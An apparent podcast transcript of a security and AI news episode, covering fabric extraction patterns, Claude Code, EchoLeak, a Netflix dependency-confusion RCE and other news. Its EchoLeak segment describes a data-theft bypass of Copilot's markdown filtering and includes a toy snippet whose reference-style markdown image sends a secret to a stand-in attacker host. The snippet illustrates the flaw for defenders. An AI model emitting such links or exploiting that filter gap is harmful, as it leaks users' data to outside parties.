
June 18, 2025 • 36 mins

STANDARD EDITION: Netflix RCE, My Current AI Stack, All-in on Claude Code, and more...

You are currently listening to the Standard version of the podcast. Consider upgrading and becoming a member to unlock the full version and many other exclusive benefits here: https://newsletter.danielmiessler.com/upgrade

Read this episode online: https://newsletter.danielmiessler.com/p/ul-485

Subscribe to the newsletter at:
https://danielmiessler.com/subscribe

Join the UL community at:
https://danielmiessler.com/upgrade

Follow on X:
https://x.com/danielmiessler

Follow on LinkedIn:
https://www.linkedin.com/in/danielmiessler

Become a Member: https://danielmiessler.com/upgrade

See omnystudio.com/listener for privacy information.


Episode Transcript

Available transcripts are automatically generated. Complete accuracy is not guaranteed.
S1 (00:17):
All right, welcome to episode 485. I posted a bunch of fabric extractions of stuff that I've been watching and reading: YouTube videos, blog posts, academic papers. And I think I'm going to do more of this, because I'm actually building it into my PAI, my personal AI infrastructure. This is the infrastructure you've heard me talking about in the Augmented class,

(00:40):
and all over X and in the newsletter over the years. This is basically the back-end core infrastructure that runs my life: it's finding all my content, categorizing it, labeling, sorting, extracting summaries, characterizing, things like that.

(01:02):
And I'm basically going to use it to continue enhancing my life, right? So I'm always adding to this thing. One of the core components of it is actually finding new content in an automated way. I'll give you a good example: arXiv. I think that's the way you pronounce it; I've heard

(01:22):
people say it that way. I used to pronounce it differently because, whatever, I'm silly. "Archive," I guess, is how it's said, and it's a cool name, even though "arXiv" is how it's spelled. Anyway, on arXiv there is an RSS feed for cs.AI, so it's papers coming out

(01:48):
of arXiv that are both CS-related and AI-related, and obviously this is a sweet spot for me. So I want to be able to go and get those papers, but I also want to know how high quality they are: what are the interesting claims they're making? How good was their methodology, their testing? Was it a

(02:08):
meta-study? Did they do their own independent research for the paper? All those combinations. And there's already a fabric pattern for this, which is analyze_paper, and I think I have a new version of it as well. Anyway, I want to do that type of automated analysis on every paper I might want to read, something like the sketch below. This is kind of giving you hints of what my personal AI infrastructure does.
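Roughly like this, as a minimal sketch: the feed URL is arXiv's public RSS endpoint for cs.AI, but the rest assumes the fabric CLI is installed and configured and that feedparser is available; adjust to taste.

```python
# Sketch: pull new cs.AI papers from arXiv's RSS feed and run each
# abstract through fabric's analyze_paper pattern.
# Assumes: fabric CLI installed/configured, `pip install feedparser`.
import subprocess
import feedparser

FEED_URL = "https://rss.arxiv.org/rss/cs.AI"

feed = feedparser.parse(FEED_URL)
for entry in feed.entries[:5]:  # cap it while testing; the feed is big
    paper = f"{entry.title}\n\n{entry.summary}"
    result = subprocess.run(
        ["fabric", "--pattern", "analyze_paper"],
        input=paper, capture_output=True, text=True,
    )
    print(f"== {entry.title}\n{result.stdout}")
```

A real version would pull the full paper text rather than just the abstract, and store the ratings somewhere queryable, but that's the shape of the module.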

(02:30):
And by the way, I'm aware of the fact that I'm saying "like" a little bit too much, so I'm trying to tamp that down. I like the word, I think it's a cool transition word, but I don't want to use it 40 times in every sentence. Anyway, this is the infrastructure that I'm actually building,

(02:51):
and this is one of the modules that's really, really important to me, because it's not just papers. I want this for open source intelligence; I want this for all the different stuff. These are all the independent modules that I'm building, and those essentially turn into products for me. So my Intel product is going to be the output of one of these.

(03:11):
Threshold is already the output of several of these, right? So anyway, that's just a brief little thing on my PAI. All that to say, these fabric extractions are essentially outputs from these modules where it's found a piece of

(03:31):
really unique content, or I manually found it and just ran fabric against it, and it produced this output. So you could check it on X, you could see it there; I do a few of these in the newsletter every once in a while. But I find it really useful to go and extract predictions, to extract wisdom. Extract insights is another one

(03:54):
of my favorites. There's also one that just extracts quotes, which can also be really interesting. I think there's one that just extracts data or recommendations; there's definitely a recommendations one, actually, now that I think about it. And I need one that extracts a book list or a watch list, but I'm not sure if I already made that one or if I need to go add it to fabric. Running a handful of these against one piece of content looks roughly like the sketch below.
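A hedged sketch: the pattern names are the ones mentioned here, but verify them against your installed fabric patterns, since I'm going from memory on exactly which exist; the input filename is just a placeholder.

```python
# Sketch: run several fabric extraction patterns over one captured
# piece of content, saving each output to its own file.
# Pattern names are the ones discussed above; verify they exist
# in your fabric patterns directory before relying on them.
import subprocess
from pathlib import Path

PATTERNS = [
    "extract_wisdom",
    "extract_predictions",
    "extract_insights",
    "extract_quotes",
    "extract_recommendations",
]

content = Path("article.txt").read_text()  # whatever you captured

for pattern in PATTERNS:
    result = subprocess.run(
        ["fabric", "--pattern", pattern],
        input=content, capture_output=True, text=True,
    )
    Path(f"{pattern}.md").write_text(result.stdout)
```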

(04:16):
Anyway, all this to say: I want my PAI always running in the background, always collecting, always finding, always discovering, always rating. And before you think, "well, hold on, the AI is doing too much work for you": no, it is

(04:39):
not doing too much work for me. And here's why.
Part of this entire thing is the determination of what
I should go and do slowly. Okay? Anything that makes
it into that bucket, I must sit down and manually
enjoy and listen to and process and use my pen

(05:00):
and my index cards and write down notes, or Apple Notes or whatever it is, even if I have to pause the thing. But I still think the absolute best way to experience anything is in the slow form, right? What's still the best possible way to spend an evening? It's with friends and family and smart people or whatever, where

(05:22):
you're basically having conversations with actual humans. So to me, the whole purpose of all this AI stuff is to enhance your ability to do those things. This is all part of Human 3.0. It's all part of asking what we should actually be doing, and what we should actually be doing is magnifying human experience.

(05:43):
Slow experience, right? All this speeding up and all this collection, all of it should be in service of that, not in opposition to it. All right, that's how we get stuck on the first item without even getting into the newsletter. Okay. Yeah, go sign up for the podcast again,

(06:04):
which is silly because you're already listening to it. Let's see here. My friend Tracy Talbot is presenting "Tell No Lies: Teaching AI to Know When It Doesn't Know." Yeah, to know when it doesn't know. That's June 26th in Austin, and she's got a LinkedIn post that I linked in the newsletter. I worked with her at Apple.

(06:25):
She was extraordinary there; she was doing data quality on our team. Just a really, really great person, really thoughtful about data quality, data security, all these different aspects of data, and basically data management at

(06:48):
scale and thinking about what it means to trust data. Now she's getting into AI, and she's been doing a whole lot of really cool stuff with that, so I definitely recommend going to see her talk. Again, that's June 26th in Austin. All right, places I'm going to be speaking in 2025, and I realized I missed an item

(07:09):
on the list. Various talks and panels at Black Hat USA in Vegas. Speaking at Swiss Cyber Storm in Bern, Switzerland; that's going to be an AI workshop, actually. I'm going to do a workshop for people that's going to be a combination of Augmented slash fabric slash, essentially, personal AI infrastructure. That's kind of what that thing's going to

(07:30):
be about. Keynoting AppSec USA in DC in November, and speaking at Black Hat MEA in Saudi Arabia in December. And the one that I missed is that I'm probably going to be doing something in Sweden as well. I can't remember the exact date for that one, but yeah,

(07:51):
I'll probably add it to the list for the next newsletter on Monday. Personal tech stack updates: I'm all in on Claude Code. I'm not going to go into why... but ultimately, and here I am going into why, it's because Anthropic uses it as their agentic coding agent, and they've

(08:13):
gone all in on agentic coding, which means this thing isn't hacking together agents; it's actually using agents to execute the various tasks. And as of today, I just updated Claude Code, and now it has planning built in. As I've been saying pretty much everywhere, I think scaffolding around AI is the superpower that's about to

(08:38):
unlock this whole thing, because the models are already smart. The problem is they can't think for long, and they have short memories, so we have all these context problems. Any person, any intelligent being, gets really stupid when it can't remember longer than a short conversation

(09:00):
and then has to go back into a stored memory bank that isn't perfect. I'm talking about RAG, for example. Or if you have actual humans who struggle with long-term memory, or even short-term memory, obviously they're going to be less functional, right? They're going to be less capable than they were before they lost those abilities. So, the ability to, as

(09:25):
Dwarkesh talks about, learn on the job. Think about a knowledge worker. They go in, they do orientation, they learn on the job. Guess what? After that first week, they're way better than when they started, because now they have some knowledge. Well, what happens after six months? After a year? After they've been there for 20 years? They now have all this stored

(09:48):
knowledge about the company, which is now part of their context. But the difference is that with a human, it's natural and fluid: every time they make a decision, they are drawing on their stored knowledge. They incorporate their stored knowledge into every decision they make. That

(10:10):
is a thing that AI currently cannot do. It struggles. It's like: oh, I've got to go grab all this context and stuff it into the prompt. How do you grab the context of 25 years of learning at a job? How do you know what that even means? How do you even know what to query to stuff into your

(10:32):
decision-making process? This is completely transparent with humans. When we say, "let me approach this problem from a holistic standpoint, let me talk to all these disparate teams across the org, and I'm going to gather notes and write them down or whatever," your brain is going crazy with all of the knowledge that you've gathered over

(10:53):
those 25 years. It's making its own queries and pulling back that context, and the results come back to you as insights or thoughts or creativity. You don't get to see exactly what the queries look like, or even what the returned results look like. We do not have this with AI. We must manually go

(11:16):
and make queries into context, like with RAG, or by stuffing other context or context summaries into the prompts themselves. This is the scaffolding that we need. We need to emulate the process that humans execute naturally every day, hundreds or thousands or millions of times. A toy version of that manual retrieve-and-stuff loop is below.
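To make it concrete, here's a self-contained toy of the loop: real systems use embeddings and a vector store, but the shape is the same, and the notes here are obviously made-up placeholders.

```python
# Toy sketch of the manual "query stored memory, stuff the prompt" loop
# that RAG automates. Bag-of-words cosine similarity stands in for
# embeddings so this runs with just the standard library.
from collections import Counter
import math

memory = [  # placeholder "stored knowledge" notes
    "Q3 postmortem: the outage was caused by a bad quota config push.",
    "Team norms: all schema changes require a design doc review first.",
    "The billing service owns the invoice table; never write to it directly.",
]

def similarity(a: str, b: str) -> float:
    """Cosine similarity over word counts: a stand-in for embeddings."""
    wa, wb = Counter(a.lower().split()), Counter(b.lower().split())
    dot = sum(wa[w] * wb[w] for w in wa)
    na = math.sqrt(sum(v * v for v in wa.values()))
    nb = math.sqrt(sum(v * v for v in wb.values()))
    return dot / (na * nb) if na and nb else 0.0

def build_prompt(question: str, k: int = 2) -> str:
    # The manual query into stored memory: rank notes, take top-k,
    # and stuff them into the prompt as context.
    top = sorted(memory, key=lambda n: similarity(question, n), reverse=True)[:k]
    context = "\n".join(f"- {note}" for note in top)
    return f"Context from stored memory:\n{context}\n\nQuestion: {question}"

print(build_prompt("why did the outage happen last quarter?"))
```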

(11:39):
However many times it is that we're making decisions, and little tiny nano-decisions and micro-decisions. I don't remember how I got onto this, but scaffolding is massively, massively important, and that's why I think context is so important to all of this stuff. Oh,

(12:01):
I remember how: Claude Code. So they are all in on the agent stuff, and they are all in on the planning component. This planning component is yet another piece of what I just talked about: it is keeping in mind what we're trying to do overall, and then checking off little boxes of, yeah, we've done this; yeah,

(12:21):
we've done this. It's all about context management. Now, "context" is a little bit overloaded here; I would say context-planning management, learning-on-the-job management, long-term task management. These are the types of things that really good knowledge workers, like a principal engineer who's

(12:47):
been somewhere for 25 years, are really good at. And these are the areas where, and this is just my prediction, we're going to see major advances. They're actually kind of like tricks. This is what I've been telling my friend

(13:08):
Joel ever since 2023: these types of tricks are the things that are going to push us over the edge. These are the types of tricks that are going to hyper-jump AI way further ahead. And I think my theory has been borne out through things like post-training. Post-training is not fundamentally better neural nets; it's

(13:33):
better ways of shaping neural nets and getting them to do what we actually want them to do. So, just zooming out: I think Claude Code has this figured out. I think Anthropic really deeply understands it, and they are building agents and planning management and context management. They're doing really,

(13:56):
really well with it, in a way that makes me just really excited to build things with Claude Code, and in a way that's not really hitting for me on the other platforms. My secondary backup to Claude Code is still Cursor. I was messing with Windsurf for a while and some other tools, and I still dabble with all the

(14:18):
other tools; when I see something new come out, I go and tinker with it. But right now, Claude Code is my main, with Cursor as secondary. I've also switched over to using Dia as my main daily driver for my browser. And I'm on all the macOS 26 betas; they are fantastic. Specifically, having

(14:43):
the Phone app on the desktop is fantastic, and the Podcasts app is much improved: you can actually go above the 2x limit now, up to 3x. And yeah, overall I would say Apple just did a lot of quality updates; for example, AirPods handoff is much better. So that's it for updates,

(15:07):
I think. And let's get into cybersecurity. Apple quietly fixed an iPhone zero-day that was used against journalists. EchoLeak uses markdown syntax to bypass Microsoft 365 Copilot security: some researchers found a smart way to steal data from Copilot by using obscure markdown link formats that Microsoft did not filter. The toy sketch below shows the general class of bypass.
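To be clear, this is not the actual EchoLeak payload and not Microsoft's filter; it's a hypothetical illustration of the class of bug, where a filter that only matches inline-style markdown links misses the reference-style form.

```python
# Toy illustration (NOT the real EchoLeak payload or Microsoft's filter):
# a naive filter that strips inline markdown links/images misses the
# reference-style form, which still renders as a link or image.
import re

def naive_filter(text: str) -> str:
    """Toy filter: only catches the inline form [label](url) / ![alt](url)."""
    return re.sub(r"!?\[[^\]]*\]\([^)]*\)", "[removed]", text)

inline = "![exfil](https://attacker.example/?d=SECRET)"
reference = "![exfil][1]\n\n[1]: https://attacker.example/?d=SECRET"

print(naive_filter(inline))     # caught: becomes [removed]
print(naive_filter(reference))  # untouched: still renders, still leaks
```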

(15:31):
Researchers turn a 2 a.m. Tokyo hotel room chat into a Netflix RCE. So Shubs, who is a friend of mine and a very, very good attacker, um,

(15:51):
what are we saying, researcher? Bug bounty guy? Security guy focused on offensive security and automated testing. He's also the creator of Assetnote. He's just one of the top, you know, the 1% of the 1%; I would put him up in that top, top echelon with Sam Curry. And basically, they found

(16:17):
a way to attack an unclaimed internal package name called NFC Logger, and they used that to get RCE on a Netflix system, within Netflix itself. And I'm sure they fixed it; otherwise we wouldn't be talking about it. A quick check for that class of exposure is sketched below.
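Unclaimed internal package names are the dependency-confusion class of problem: if the name isn't claimed on the public registry, anyone can publish it and wait for a build system to pull it. A hedged sketch of checking your own names against npm's public registry API; the package names here are hypothetical placeholders, not the actual Netflix package.

```python
# Sketch: check whether internal package names are unclaimed on the
# public npm registry. A 404 means anyone could publish that name.
# Package names below are hypothetical placeholders.
import urllib.error
import urllib.request

INTERNAL_PACKAGES = ["acme-internal-logger", "acme-build-tools"]

for name in INTERNAL_PACKAGES:
    try:
        with urllib.request.urlopen(f"https://registry.npmjs.org/{name}") as resp:
            print(f"{name}: claimed on npm (HTTP {resp.status})")
    except urllib.error.HTTPError as err:
        if err.code == 404:
            print(f"{name}: UNCLAIMED, dependency-confusion exposure")
        else:
            print(f"{name}: check failed (HTTP {err.code})")
```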

(16:39):
All right, I'm going to skip over the Tliose sessions offer that was in there; don't really want to talk about that. The HTML spec now escapes angle brackets in attributes, so Chrome and other browsers are going to start escaping left and right angle-bracket characters in HTML attributes to prevent

(16:59):
mutation XSS attacks. Interpol dismantles 20,000 malicious IPs linked to 69 malware variants. A Cursor security-rules project tackles unsafe AI-generated code. Europol, yeah, Europol says stolen data

(17:20):
has become the new underground currency. Phishing messages, and this is a quote, "created by LLMs have a higher success rate than those written by humans." And that's from Europol's IOCTA report. US airlines are quietly selling flight data to DHS. Yeah.

(17:41):
Government agencies can search 39 months of flight data, including passenger names, itineraries, travel dates, and credit card numbers. Other agencies buying this data include the Secret Service, SEC, DEA, and US Marshals Service, in addition to DHS and all its various services. Amazon's AI agents can

(18:06):
build cyber defense signatures in minutes. National security: thoughts on Israel's action against Iran. I'm actually not going to go deep into this one; it's an evolving situation, and as everyone knows, new stuff is happening every few hours. Go,

(18:26):
go read the newsletter if you want to see my take on it. The Army is commissioning Big Tech executives as lieutenant colonels: four Silicon Valley executives from Meta, Palantir, and OpenAI are being brought in as lieutenant colonels to speed up the government's adoption of technology. And I'm overall

(18:47):
for this, but I also have my spider senses going off in terms of a dystopia-type situation. Again, I see the value of Palantir. I see the value of winning at almost any cost against China, right? That

(19:10):
is why I support this type of move from the military, and why I support, overall and in some ways, companies like Palantir and Anduril, and why these companies exist. Yes, we need to move super fast. Unfortunately, the cultures, the ambitions, and a whole bunch of externalities often come

(19:35):
with moving really fast and in really ambitious ways, especially with technology companies making tons of money supporting the military. I don't think I need to spell it out: there's possibility for harm here. And I think we have to take that risk. I

(19:57):
think this is the right move, to take that risk. But holy crap, is it scary? Yes. Do we need oversight? Yes. Do we need to be extremely careful? Yes. Do we need to not turn our eyes away and just hope it all works out? Absolutely. Cheap drones will massively disrupt current large-military dominance. Yeah, Israel and Ukraine

(20:21):
are showing that $500 drones can destroy extremely expensive military gear, which could upend the advantage of countries like Russia and the US; we're already seeing it with Russia in Ukraine. Big scope aside on this one: I'm curious about how

(20:42):
this is going to start trickling into consumer and personal security. Like, when will executive protection teams all need to have anti-drone tech as part of their package? Probably sooner rather than later, I think. AI: that Apple paper saying AIs don't reason was highly flawed. Someone named Alex

(21:02):
Lawsen says the paper basically didn't do a good job and that it was easy to make better examples. Although, I've heard someone did a paper like this, and it might have been Alex Lawsen's, actually; I don't know if it was this one. But I heard somebody say that

(21:22):
this whole takedown paper was actually Claude-generated and wasn't a real paper. It was just, I don't know, fake or hype or whatever, and they didn't expect it to blow up so much. I don't know if it was this one, but it's interesting to note. Also interesting to note, and I'm going to beat up on myself here for a second: I don't know if

(21:47):
this was that paper, and it doesn't actually matter whether it was or not. The fact that I put it in the newsletter is potentially a strike against me. Think about this; I count it as a strike against myself.

(22:09):
The thing is, I'm not sure if I would do it differently. This is weird, okay, because when I put something in the newsletter and talk about it, how much have I endorsed it? Have I said for sure that this is a real paper, that these are real results, because I read the paper fully?

(22:33):
Not only that, but that I looked at all the testing methodologies, evaluated the data, and confirmed their testing was not a lie? That is a level of depth that I cannot do for the number of papers and stories that I'm covering. So what I'm saying is, it is possible for me to be duped,

(22:55):
and this one very well could be such a case. In fact, you know what, I'm going to click a link here and see if there are updates. I don't think so. I don't think so. But it doesn't actually matter: this paper that I included might be completely legit, and I think it is,

(23:16):
but it doesn't actually matter, because this strike against me still counts, right? So this is a question from me to myself, and also from you to me. You've got to watch what people are posting, and you've got to watch how sure they are that the thing is actually real,

(23:40):
and whether or not they're just using something that sounds real to support their own opinion. This one happened to go with my opinion. Oh, so what do you know? Magically, I just included it in the newsletter as support for my opinion. Well, what if it turns out it was complete garbage? Well, then I'm just like anyone else who is posting

(24:01):
random garbage. I would argue I'm not like that, but I'm saying it looks kind of the same, so it doesn't really matter how big the difference is. So just keep this in mind, and not just for me, but for yourself: you've got to watch whether the evidence that's coming in is only air-quote "evidence," because how much

(24:22):
time have you actually spent looking at the evidence, redoing the paper yourself? And how much are we using external validation, or citations pointing to a paper, as support for the paper being legit? And I

(24:43):
think it gets more and more serious the further we go. The good news is, a big part of my personal AI infrastructure is going to be finding stuff like this. I want to be able to find stuff like this with my AI infrastructure, where it's like: I don't know, seems like they use a lot of catchy AI terms in here, and it looks like they were really

(25:04):
hand-wavy with their examples. I want to be able to catch this stuff for myself. Just something to keep in mind. OpenAI's o3-pro is very smart but context-hungry. Agreed. Man killed by police after spiraling into ChatGPT-driven psychosis. Google plans to cut ties with Scale AI because, basically,

(25:26):
Meta bought like half of them or something. A CIO wants to clone staff as digital twins and AI agents: UC San Diego's CIO wants to extract knowledge from experienced IT staff and create digital twins that handle routine problems. Well, yeah, obviously. You've got some greybeard, you know, Chris Myers,

(25:51):
who's been at the company for 41 years and knows everything, and anyone who finds something broken that nobody can fix calls Chris Myers. So the CIO is like: let's go find Chris Myers, let's interview him for seven weeks in a dark, padded room, pull out all of his knowledge, and put

(26:12):
that into an AI agent, and now you can just ask a virtual Chris Myers. Well, obviously we need this for everything, right? We need this for the best doctors, the best psychiatrists, everything. This is the problem when extremely experienced people leave a company: you lose all the knowledge they take with them. And

(26:36):
unfortunately for AI, it's also knowledge that you can't possibly extract from them efficiently, right? You can't possibly ask enough questions to gather their knowledge. Their knowledge is, let's call it, infinite: 41 years of knowledge essentially baked

(26:56):
in, like into an AI model. That's a great analogy, actually: how many questions do you have to ask o3 to get all of o3's knowledge out of it? The answer is an infinite number of questions. So it doesn't matter how much you interview Chris Myers, who's been

(27:18):
there for 41 years; you're not going to get enough, right? So this is a serious challenge. ChatGPT dominates LLM usage with 86% market share; I did not know it was that high. Technology: a fabric summary of the massive Google outage. Yeah, this is really cool.

(27:40):
So Google put out their giant paper saying what happened, and when I see a 14-page paper or whatever about an outage, describing an outage, it's not deep human knowledge that I'm getting. That's where I run extractions. I've got this pattern called create_story_explanation,

(28:03):
spelled create, underscore, story, underscore, explanation. It is one of my favorite patterns. It explains anything at about a ninth-grade level in kind of a story format: this happened, then this happened, then this happened. It's just very clear. So I recommend checking it out if you care about

(28:26):
that outage, but more importantly, using it against other stuff. A sketch of one run is below.
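Something like this, assuming the fabric CLI is installed and you've saved the incident writeup locally; the filename is just a placeholder.

```python
# Sketch: run a saved incident writeup through fabric's
# create_story_explanation pattern. Input filename is a placeholder.
import subprocess
from pathlib import Path

postmortem = Path("google-outage-writeup.txt").read_text()

result = subprocess.run(
    ["fabric", "--pattern", "create_story_explanation"],
    input=postmortem, capture_output=True, text=True,
)
print(result.stdout)  # a plain "this happened, then this happened" retelling
```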
YouTube officially beats all other streaming platforms in US viewership: they have 13% of all US TV viewership. Oh, wow. Okay, I thought it was 13% of streaming; I read that wrong. 13% of all US TV viewership. That's insane.

(28:55):
That's insane. Okay: YouTube by itself is 13% of TV. Yeah, it seems very high, and I bet that goes up a crazy amount in the next few years. It's basically the only TV that I watch. I was actually at a resort yesterday in Napa, and they only had regular TV, and it was like a commercial rectangle.

(29:19):
All I did was watch commercials, and occasionally they would show part of a show. Anyway. Amazon joins the big nuclear party, buying 1.2GW for AWS. tvOS 26 hints at a built-in camera for a new Apple TV 4K. I wish it were an Apple TV 8K, and I

(29:40):
wish it had ten-gigabit Ethernet; that's what I wish. But I would like to see a camera, because I'd like to do FaceTime from the couch in the living room. That would be nice. I also don't want a camera facing the living room, though, so I would need one of those flip-cover dongle things. Apple's

(30:01):
iPadOS 26 finally makes the iPad a real computer. Everyone is talking about this. People are saying it actually lets you use an iPad as a laptop, or very nearly, and it's been kind of universal; people are saying, holy crap, this is really, really good.

(30:22):
I have not tried it. I don't use my iPads much, and the reason is I just didn't like the OS. The only things I use one for are reading, drawing, and sketching, doing stuff like that with Freeform. And for that I really love it, and for reading I really love it. But I don't use it as a computer, because I prefer laptops. Maybe that will change.

(30:46):
The argument that it's time to kill Siri: I did not know that I believed this, but I definitely do. I think once Apple fixes its AI interface, its universal AI life OS that I've been talking about, they need to call it something new. Siri has too much baggage.

S2 (31:07):
I can show them if you ask.

S1 (31:09):
Hey Siri, stop. The one time Siri actually listens is when I'm trying to record. Essentially, that system does not turn lights on and off reliably. It has so many problems. It's been over ten years; it had its attempt, it had its chances, and now it needs

(31:31):
a new name. I thoroughly believe this. It's just a marketing concept: when you have enough bad baggage associated with something, you've got to flip it over, you've got to retire it. Nvidia writes off China revenue in company forecasts because, you know, it's too unpredictable with the current administration. Waymo rides cost more than Uber or Lyft, but people are happily

(31:52):
paying it, often $5 or $10 more for a ride versus an Uber or a taxi. But people are still paying, and they're still making money, because it's so much better an experience. Humans: Trump ends protection for Afghans as Congress scrambles to intervene. I'm really upset about this, really upset. These Afghans helped

(32:18):
the US military during the war, and they cannot go back because they are being hunted by the Taliban, and their families are being watched by the Taliban. They are in grave danger, and so are their families. And if they're forcibly kicked out of the US and go back and try to link up with their families,

(32:42):
it essentially damns them and their families, potentially to die. And this is after they served and sacrificed for the US military. I do not believe we should treat allies like that. Robin AI system makes first autonomous scientific discovery.

(33:03):
So this is FutureHouse's Robin. I've talked about automated science assistants before, and this is even more end-to-end; it's the entire research process. It discovered that ripasudil could treat dry macular degeneration by orchestrating multiple specialized agents

(33:28):
to handle the entire research process autonomously, in just 2.5 months. Who knows how much of that is the, air quotes, "entire" research process, but supposedly it went end to end and actually worked. So this is the type of thing that I think is really, really exciting.

(33:50):
Ultra-black paint might solve the satellite light-pollution crisis. Although I'm curious: wouldn't you just see black dots moving through your pictures, blocking out stars and the moon or whatever? I guess the black dots wouldn't be as annoying, but it seems like they could still overwrite stars. If you

(34:12):
are trying to take a picture of the starry sky, you might still see artifacts, but it won't be nearly as bad as a bright white line drawn over your picture; actually, multiple bright white lines. But I wonder how feasible this is. Like, are we going to pull down all the ones that are already up there?

(34:33):
Are we going to paint the ones that are up there? Doubtful. So this would involve painting all the new ones going up, which unfortunately is many thousands. And the Pentagon has evidently been pushing Americans to believe in UFOs for decades. According to this report, it's

(34:53):
to cover up actual secret weapons programs; they basically circulate this stuff on purpose to get people talking about a red herring. Discovery: fiddleitm brings malicious traffic detection to the mitmproxy man-in-the-middle proxy. Oh, I'm not going to actually read all of these, so I'm just going to scroll through and look for some really cool ones,

(35:14):
or any from my friends. Let's see. Boom, boom, boom, boom. Oh, Sam Altman's "The Gentle Singularity." You probably want to read this one. I've also got fabric-extracted predictions from it in the newsletter, so check that out. And yeah, I think that's about it. Okay,
this is the end of the standard edition of the podcast,

(35:36):
which includes just the news items for the week. To get the rest of the episode, which includes much more of my analysis, the ideas section, and the weekly member essay, please consider becoming a member. As a member, you get access to all sorts of stuff, most importantly access to our extraordinary community of over a thousand brilliant and kind people in industries like cybersecurity, AI, and the humanities. You

(35:56):
also get access to the UL Book Club, dedicated member content and events, and lots more. Plus, you'll get a dedicated podcast feed that you can put into your client, which gets you the full member edition of the podcast; that one basically doesn't have this pitch in it and just goes all the way through with all the different sections. So to become a member and get all that, just head over to danielmiessler.com. That's Daniel Miessler, and we'll see

(36:18):
you next time.